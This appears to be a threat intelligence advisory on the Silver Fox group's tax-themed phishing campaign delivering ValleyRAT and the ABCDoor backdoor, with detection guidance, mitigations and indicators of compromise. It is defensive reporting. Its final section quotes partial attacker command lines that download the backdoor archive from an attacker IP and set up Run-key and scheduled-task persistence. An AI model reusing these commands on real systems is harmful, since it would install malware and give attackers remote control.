Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India

What Happened

A cybercriminal group known as Silver Fox is sending fake tax notices to organizations in Russia and India. When victims open the attached files or links, a hidden program is installed that eventually loads a new, custom-built tool called ABCDoor. This tool allows the attackers to secretly control the infected computer and record the user's screens. Organizations should be highly suspicious of unsolicited tax-related emails and ensure their security software is up to date.

Key Takeaways

• The Silver Fox threat group is targeting Russian and Indian organizations using tax-themed phishing emails.
• Attackers utilize a modified RustSL loader featuring 'Phantom Persistence' and geofencing checks to evade analysis.
• The attack chain deploys the ValleyRAT backdoor, which subsequently downloads a novel Python-based backdoor named ABCDoor.
• ABCDoor masquerades as the legitimate Tailscale VPN client and uses ffmpeg for multi-monitor screen broadcasting.
• The threat actors use a segmented infrastructure, separating payload delivery servers from command-and-control (C2) servers.

Affected Systems

• Windows OS

Attack Chain

The attack begins with tax-themed phishing emails containing malicious PDFs or archives. Victims execute a modified RustSL loader that decrypts a shellcode payload, which in turn downloads and executes the ValleyRAT backdoor. ValleyRAT then retrieves a custom module to download the ABCDoor Python backdoor archive, extracting it to a directory masquerading as Tailscale VPN. Finally, ABCDoor establishes persistence via registry keys or scheduled tasks and connects to its C2 for remote control and screen broadcasting.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: Yes
• Platforms: Kaspersky Endpoint Detection and Response Expert

Kaspersky provides specific detection rules (nodejs_dist_url_amsi, access_to_ip_detection_services_from_nonbrowsers, persistence_via_environment) within their EDR Expert platform.

Detection Engineering Assessment

EDR Visibility: High — The attack involves multiple process creations (cmd, powershell, curl, pythonw), registry modifications for persistence, and file drops in AppData and ProgramData, all of which are highly visible to EDR. Network Visibility: Medium — C2 communication is HTTPS, but initial payload downloads (ZIP files) and geofencing checks to public IP APIs are visible in network telemetry. Detection Difficulty: Moderate — While the tools use custom encryption and Phantom Persistence, the reliance on standard LOLBins (curl, powershell) and noisy registry persistence makes behavioral detection feasible.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• Registry Value Set (Sysmon 13)
• File Creation (Sysmon 11)
• Network Connection (Sysmon 3)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for pythonw.exe executing with the '-m appclient' argument, indicating ABCDoor execution.	Process Creation	Execution	Low
Monitor for curl.exe or powershell.exe downloading ZIP archives to the AppData directory.	Process Creation, Command Line	Command and Control	Medium
Detect non-browser processes (like unknown executables or pythonw.exe) making outbound connections to IP geolocation services (e.g., ipinfo.io, ip-api.com).	Network Connections, DNS Queries	Discovery	Medium
Identify modifications to the HKCU\Environment\UserInitMprLogonScript registry key, a known persistence mechanism used by the JS loader.	Registry Modifications	Persistence	Low

Control Gaps

• Email security gateways failing to inspect links within attached PDFs

Key Behavioral Indicators

• pythonw.exe running from C:\ProgramData\Tailscale\python\
• Creation of %LOCALAPPDATA%\applogs\device.log
• schtasks creating a task named 'AppClient'

False Positive Assessment

• Low. The specific combination of pythonw.exe executing the 'appclient' module, masquerading as Tailscale in ProgramData, and the specific registry keys (CarEmu) are highly unique to this threat.

Recommendations

Immediate Mitigation

• Block known C2 IP addresses and domains associated with ABCDoor and ValleyRAT.
• Search endpoint telemetry for the presence of 'appclient' in command lines or scheduled tasks.

Infrastructure Hardening

• Restrict the execution of pythonw.exe from non-standard directories like ProgramData or AppData.
• Implement strict email filtering rules to quarantine PDFs containing suspicious external links.

User Protection

• Deploy EDR solutions configured to monitor for suspicious child processes spawned by PDF readers or Office applications.
• Disable or restrict the use of curl.exe and powershell.exe for standard users.

Security Awareness

• Train employees to recognize tax-themed phishing lures and verify the sender's address.
• Instruct users not to click on links within unsolicited PDF documents.

MITRE ATT&CK Mapping

• T1566.001 - Phishing: Spearphishing Attachment
• T1566.002 - Phishing: Spearphishing Link
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1059.003 - Command and Scripting Interpreter: Windows Command Shell
• T1059.006 - Command and Scripting Interpreter: Python
• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1053.005 - Scheduled Task/Job: Scheduled Task
• T1036.005 - Masquerading: Match Legitimate Name or Location
• T1113 - Screen Capture
• T1614.001 - System Location Discovery: System Language Discovery
• T1105 - Ingress Tool Transfer

Additional IOCs

• Ips:
  • 108[.]187[.]37[[.]]85 - ValleyRAT C2 IP address
  • 108[.]187[.]42[[.]]63 - ValleyRAT C2 IP address
  • 108[.]187[.]41[[.]]221 - Malicious IP address associated with Silver Fox infrastructure
  • 154[.]82[.]81[[.]]192 - Malicious IP address associated with Silver Fox infrastructure
  • 139[.]180[.]128[[.]]251 - Malicious IP address associated with Silver Fox infrastructure
  • 192[.]229[.]115[[.]]229 - Malicious IP address associated with Silver Fox infrastructure
  • 207[.]56[.]119[[.]]216 - Malicious IP address associated with Silver Fox infrastructure
  • 192[.]163[.]167[[.]]14 - Malicious IP address associated with Silver Fox infrastructure
  • 45[.]192[.]219[[.]]60 - Malicious IP address associated with Silver Fox infrastructure
  • 192[.]238[.]205[[.]]47 - Malicious IP address associated with Silver Fox infrastructure
  • 45[.]32[.]108[[.]]178 - Malicious IP address associated with Silver Fox infrastructure
  • 57[.]133[.]212[[.]]106 - Malicious IP address associated with Silver Fox infrastructure
• Domains:
  • abc[.]3mkorealtd[[.]]com - ABCDoor C2 domain
  • abc[.]sudsmama[[.]]com - ABCDoor C2 domain
  • abc[.]woopami[[.]]com - ABCDoor C2 domain
  • abc[.]ilptour[[.]]com - ABCDoor C2 domain
  • abc[.]petitechanson[[.]]com - ABCDoor C2 domain
  • abc[.]doublemobile[[.]]com - ABCDoor C2 domain
  • mcagov[[.]]cc - ABCDoor loader C2 domain
  • roldco[[.]]com - ABCDoor loader C2 domain
  • vnc[.]kcii2[[.]]com - C2 domain for malicious remote control utilities
• Urls:
  • hxxps://abc[.]haijing88[[.]]com/uploads/фнс/фнс[.]zip - URL hosting malicious archive linked in Russian phishing PDF
  • hxxps://abc[.]haijing88[[.]]com/uploads/印度邮箱/CBDT[.]rar - URL hosting malicious archive linked in Indian phishing PDF
  • hxxp://154[.]82[.]81[[.]]205/YD20251001143052[.]zip - URL hosting the ABCDoor Python backdoor archive
  • hxxp://154[.]82[.]81[[.]]205/YN20250923193706[.]zip - URL hosting the ABCDoor Python backdoor archive
• File Hashes:
  • 13669B8F2BD0AF53A3FE9AC0490499E5 (MD5) - ABCDoor .pyd core module
  • 5B998A5BC5AD1C550564294034D4A62C (MD5) - ABCDoor .pyd core module (early version)
  • 2B92E125184469A0C3740ABCAA10350C (MD5) - SFX archive containing ABCDoor JavaScript loader (BillReceipt.exe)
  • 039E93B98EF5E329F8666A424237AE73 (MD5) - Silver Fox RustSL loader
  • 4A5195A38A458CDD2C1B5AB13AF3B393 (MD5) - ValleyRAT plugin used to install ABCDoor
• Registry Keys:
  • HKCU:\Software\CarEmu:FirstInstallTime - Registry key used by ABCDoor to store initial installation timestamp
  • HKCU:\Software\CarEmu:InstallChannel - Registry key used by ABCDoor JS loader to store installation channel
  • HKCU:\Environment:UserInitMprLogonScript - Registry key modified by Silver Fox payload for persistence
  • HKCU:\Console\IpDate - Hardcoded registry location checked upon ValleyRAT Login module startup
• File Paths:
  • C:\ProgramData\Tailscale - Directory used by ABCDoor to masquerade as legitimate VPN software
  • %LOCALAPPDATA%\appclient\111.zip - Path where the downloaded ABCDoor archive is saved
  • %LOCALAPPDATA%\applogs\device.log - File created by ABCDoor to store the victim's ID
  • %LOCALAPPDATA%\applogs\exception_logs.zip - Archive created by ABCDoor to log exceptions
• Command Lines:
  • Purpose: Download ABCDoor archive via PowerShell | Tools: powershell.exe | Stage: Execution | Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' -OutFile
  • Purpose: Download ABCDoor archive via curl | Tools: curl.exe | Stage: Execution | curl.exe -L -o "%LOCALAPPDATA%\appclient\111.zip"
  • Purpose: Establish ABCDoor persistence via Registry | Tools: cmd.exe, reg.exe | Stage: Persistence | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "AppClient"
  • Purpose: Establish ABCDoor persistence via Scheduled Task | Tools: cmd.exe, schtasks.exe | Stage: Persistence | schtasks /create /sc minute /mo 1 /tn "AppClient" /tr
  • Purpose: Launch ABCDoor Python backdoor | Tools: pythonw.exe | Stage: Execution | pythonw.exe -m appclient